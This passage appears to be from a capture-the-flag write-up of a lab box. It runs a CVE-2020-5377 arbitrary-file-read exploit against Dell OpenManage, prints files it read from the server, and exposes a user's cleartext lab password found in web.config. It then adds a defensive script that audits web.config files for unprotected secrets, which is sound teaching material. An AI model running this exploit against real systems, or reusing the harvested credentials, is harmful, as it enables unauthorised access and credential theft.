Arbitrary File Read


The target OpenManage instance on the HACKSMARTERSEC (10.10.183.209) host runs an outdated version, 9.4.0.2, and is vulnerable to CVE-2020-5377.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ python3 CVE-2020-5377/CVE-2020-5377.py $tun0 $IP:1311
[-] No server.pem certificate file found. Generating one...
......+.........+...+...........+....+++++++++++++++++++++++++++++++++++++++*.....+..+..........+..+...+............+.......+........+......+....+...+.....+...+....+...+...+++++++++++++++++++++++++++++++++++++++*.....++++++
..+...+..+......+...+.+...+.....+.+......+...+...+..+.+.....+.+......+...............+..+......+++++++++++++++++++++++++++++++++++++++*.....+.+..+...+.........+......+++++++++++++++++++++++++++++++++++++++*.......+...++++++
-----
Session: 5BDE3C5788B4B8F7543499BAF4017C1A
VID: DCC0292B5655D5F3
file > C:\Windows\Win.ini
Reading contents of C:\Windows\Win.ini:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

PoC Confirmed.

web.config


file > C:\inetpub\wwwroot\web.config
Reading contents of C:\inetpub\wwwroot\web.config:
 
file > C:\inetpub\wwwroot\hacksmartersec\web.config
Reading contents of C:\inetpub\wwwroot\hacksmartersec\web.config:
<configuration>
  <appSettings>
    <add key="Username" value="tyler" />
    <add key="Password" value="IAmA1337h4x0randIkn0wit!" />
  </appSettings>
  <location path="web.config">
    <system.webServer>
      <security>
        <authorization>
          <deny users="*" />
        </authorization>
      </security>
    </system.webServer>
  </location>
</configuration>

A web.config file is located in the C:\inetpub\wwwroot\hacksmartersec\ directory. It contains a CLEARTEXT credential for the tyler user: IAmA1337h4x0randIkn0wit! Validating it against the target SSH server.
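
From the defender's side: the <location path="web.config"> deny rule in the file above is applied by IIS to HTTP requests, so it did nothing here, where the file was read through the OpenManage service on port 1311. The audit below is an added example, not part of the original notes; it flags appSettings entries that hold cleartext secrets and reports when such a deny rule is the only protection. The key-name heuristic and both sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Heuristic for secret-looking key names (an assumption of this example).
SECRET_KEY = re.compile(r"pass|pwd|secret|token|api[_-]?key", re.I)

def audit_web_config(xml_text):
    """Flag cleartext secrets in <appSettings> and note HTTP-only protection."""
    root = ET.fromstring(xml_text)
    cleartext = []
    for section in root.iter("appSettings"):
        # An encrypted section carries configProtectionProvider and holds
        # <EncryptedData> instead of readable <add> elements.
        if section.get("configProtectionProvider"):
            continue
        for add in section.findall("add"):
            if add.get("value") and SECRET_KEY.search(add.get("key", "")):
                cleartext.append(add.get("key"))
    # A <location path="web.config"> deny rule is enforced by IIS on HTTP
    # requests only; it does not stop another process from reading the file.
    url_deny = any(
        loc.get("path") == "web.config"
        and loc.find(".//authorization/deny") is not None
        for loc in root.iter("location")
    )
    return {"cleartext_keys": cleartext, "url_deny_only": bool(cleartext) and url_deny}

# Constructed sample with the same layout as the file above (placeholder value).
WEAK = """<configuration>
  <appSettings>
    <add key="Username" value="svc-example" />
    <add key="Password" value="EXAMPLE-ONLY" />
  </appSettings>
  <location path="web.config">
    <system.webServer><security><authorization>
      <deny users="*" />
    </authorization></security></system.webServer>
  </location>
</configuration>"""

# Constructed sample of an encrypted section (ciphertext is a placeholder).
PROTECTED = """<configuration>
  <appSettings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData><CipherData><CipherValue>PLACEHOLDER</CipherValue></CipherData></EncryptedData>
  </appSettings>
</configuration>"""

if __name__ == "__main__":
    print(audit_web_config(WEAK))
    print(audit_web_config(PROTECTED))
```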